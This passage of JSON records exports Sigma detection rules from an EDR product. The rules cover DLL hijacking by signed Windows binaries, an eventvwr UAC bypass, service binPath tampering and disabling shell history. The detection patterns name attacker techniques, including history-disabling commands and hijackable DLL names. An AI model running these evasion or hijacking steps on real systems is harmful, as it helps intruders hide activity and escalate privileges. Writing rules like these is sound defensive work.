"rule_description": "Detects the creation of the malicious CreateSvcRpc tool service.\nCreateSvcRpc is a tool that uses RPC to execute programs as the SYSTEM user, by creating a service.\nAdversaries can create services to elevate their privileges or achieve persistence.\nIt is recommended to investigate the process responsible for the creation of this service and to look for other malicious activities on the host.\n",
"rule_creation_date": "2023-03-28",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1543.003",
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9d024265-ae4d-4cda-881f-ad0ed35e3605",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097784Z",
"creation_date": "2026-03-23T11:45:34.097786Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097790Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rdpshell.yml",
"content": "title: DLL Hijacking via rdpshell.exe\nid: 9d024265-ae4d-4cda-881f-ad0ed35e3605\ndescription: |\n Detects potential Windows DLL Hijacking via rdpshell.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rdpshell.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dwmapi.dll'\n - '\\WINSTA.dll'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9d024265-ae4d-4cda-881f-ad0ed35e3605",
"rule_name": "DLL Hijacking via rdpshell.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rdpshell.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9d058b26-a1ae-4de9-adb0-eb2b31f22412",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093079Z",
"creation_date": "2026-03-23T11:45:34.093081Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093085Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_post_uac_bypass_eventvwr.yml",
"content": "title: UAC Bypass Executed via eventvwr\nid: 9d058b26-a1ae-4de9-adb0-eb2b31f22412\ndescription: |\n Detects a process being spawned by eventvwr.exe.\n Eventvwr.exe does not normally spawn any process, this action is probably the result of an UAC bypass attempt.\n Adversaries may bypass UAC mechanisms to elevate process privileges on a system to perform a task under administrator-level permissions.\n It is recommended to investigate the context of this action to determine its legitimacy.\nreferences:\n - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2021/01/04\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\eventvwr.exe'\n\n filter_mmc:\n Image|endswith:\n - 'Windows\\System32\\mmc.exe'\n - 'Windows\\SysWOW64\\mmc.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9d058b26-a1ae-4de9-adb0-eb2b31f22412",
"rule_name": "UAC Bypass Executed via eventvwr",
"rule_description": "Detects a process being spawned by eventvwr.exe.\nEventvwr.exe does not normally spawn any process, this action is probably the result of an UAC bypass attempt.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system to perform a task under administrator-level permissions.\nIt is recommended to investigate the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2021-01-04",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9d367155-ba9c-41bb-b835-4aff6b06be37",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611739Z",
"creation_date": "2026-03-23T11:45:34.611743Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611750Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md",
"https://attack.mitre.org/techniques/T1070/003/"
],
"name": "t1070_003_disable_history_file_linux.yml",
"content": "title: Shell History File Disabled\nid: 9d367155-ba9c-41bb-b835-4aff6b06be37\ndescription: |\n Detects the shell history file being disabled.\n Attackers may disable the shell history to hide the actions undertaken during an intrusion.\n It is recommended to investigate the parent process for other suspicious actions.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md\n - https://attack.mitre.org/techniques/T1070/003/\ndate: 2023/01/03\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.003\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_commandline:\n CommandLine|contains:\n - 'unset HISTFILE'\n - 'export HISTFILESIZE=0'\n\n # echo 'set +o history' >> ~/.bashrc\n selection_bashrc:\n CommandLine|contains|all:\n - 'set +o history'\n - '.bashrc'\n\n condition: 1 of selection_*\nlevel: high\n#level: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9d367155-ba9c-41bb-b835-4aff6b06be37",
"rule_name": "Shell History File Disabled",
"rule_description": "Detects the shell history file being disabled.\nAttackers may disable the shell history to hide the actions undertaken during an intrusion.\nIt is recommended to investigate the parent process for other suspicious actions.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9d77db37-0fd9-4f9a-8810-227bf3e3dba3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091882Z",
"creation_date": "2026-03-23T11:45:34.091883Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091888Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msiinfo.yml",
"content": "title: DLL Hijacking via MsiInfo.exe\nid: 9d77db37-0fd9-4f9a-8810-227bf3e3dba3\ndescription: |\n Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiInfo.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/04\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MsiInfo.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\msi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 
1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9d77db37-0fd9-4f9a-8810-227bf3e3dba3",
"rule_name": "DLL Hijacking via MsiInfo.exe",
"rule_description": "Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiInfo.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-11-04",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9d965041-1ded-463b-8d40-a6c515dd2f80",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075415Z",
"creation_date": "2026-03-23T11:45:34.075417Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075421Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe",
"https://attack.mitre.org/techniques/T1574/011/"
],
"name": "t1574_011_cmd_registered_as_service_path.yml",
"content": "title: Service Binary Path Modified to cmd.exe\nid: 9d965041-1ded-463b-8d40-a6c515dd2f80\ndescription: |\n Detects the modification of a service's binary path to point to cmd.exe.\n Attackers can modify a service binPath to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\n It is recommended to investigate the file pointed to by the new binary path to determine the legitimacy of this action.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe\n - https://attack.mitre.org/techniques/T1574/011/\ndate: 2022/12/23\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.011\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\\\*\\ImagePath'\n Details|endswith: 'cmd.exe'\n\n exclusion_cybereason:\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\CybereasonTI\\ImagePath'\n Details: '?:\\Program Files\\Cybereason ActiveProbe\\ActiveConsole\\CrEX3.exe*?:\\windows\\system32\\cmd.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9d965041-1ded-463b-8d40-a6c515dd2f80",
"rule_name": "Service Binary Path Modified to cmd.exe",
"rule_description": "Detects the modification of a service's binary path to point to cmd.exe.\nAttackers can modify a service binPath to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\nIt is recommended to investigate the file pointed to by the new binary path to determine the legitimacy of this action.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9da1e50d-8816-4c2f-a3f0-3d0e1965cb26",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594860Z",
"creation_date": "2026-03-23T11:45:34.594864Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594888Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_systemsettingsremovedevice.yml",
"content": "title: DLL Hijacking via SystemSettingsRemoveDevice.exe\nid: 9da1e50d-8816-4c2f-a3f0-3d0e1965cb26\ndescription: |\n Detects potential Windows DLL Hijacking via SystemSettingsRemoveDevice.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'SystemSettingsRemoveDevice.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\dui70.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9da1e50d-8816-4c2f-a3f0-3d0e1965cb26",
"rule_name": "DLL Hijacking via SystemSettingsRemoveDevice.exe",
"rule_description": "Detects potential Windows DLL Hijacking via SystemSettingsRemoveDevice.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9dd6a5c1-3a12-4223-b36e-4fe69eb7a91e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592923Z",
"creation_date": "2026-03-23T11:45:34.592927Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592934Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://twitter.com/StopMalvertisin/status/1687741617711820800?t=KgdZvNrfpQ0LQ0S3k_QjLQ&s=19",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wsatconfig.yml",
"content": "title: DLL Hijacking via wsatconfig.exe\nid: 9dd6a5c1-3a12-4223-b36e-4fe69eb7a91e\ndescription: |\n Detects potential Windows DLL Hijacking via wsatconfig.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://twitter.com/StopMalvertisin/status/1687741617711820800?t=KgdZvNrfpQ0LQ0S3k_QjLQ&s=19\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/08/22\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wsatconfig.exe'\n ImageLoaded|endswith: '\\sysglobl.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Windows\\Microsoft.NET\\Framework\\v*\\'\n - '?:\\Windows\\Microsoft.NET\\Framework64\\v*\\'\n - '?:\\Windows\\Microsoft.NET\\assembly\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Windows\\Microsoft.NET\\Framework\\v*\\'\n - '?:\\Windows\\Microsoft.NET\\Framework64\\v*\\'\n - '?:\\Windows\\Microsoft.NET\\assembly\\'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9dd6a5c1-3a12-4223-b36e-4fe69eb7a91e",
"rule_name": "DLL Hijacking via wsatconfig.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wsatconfig.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-08-22",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9e1a1a4d-470d-4a6b-a253-bc8772d2410b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588745Z",
"creation_date": "2026-03-23T11:45:34.588749Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588757Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rdpsauachelper.yml",
"content": "title: DLL Hijacking via rdpsauachelper.exe\nid: 9e1a1a4d-470d-4a6b-a253-bc8772d2410b\ndescription: |\n Detects potential Windows DLL Hijacking via rdpsauachelper.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rdpsauachelper.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n 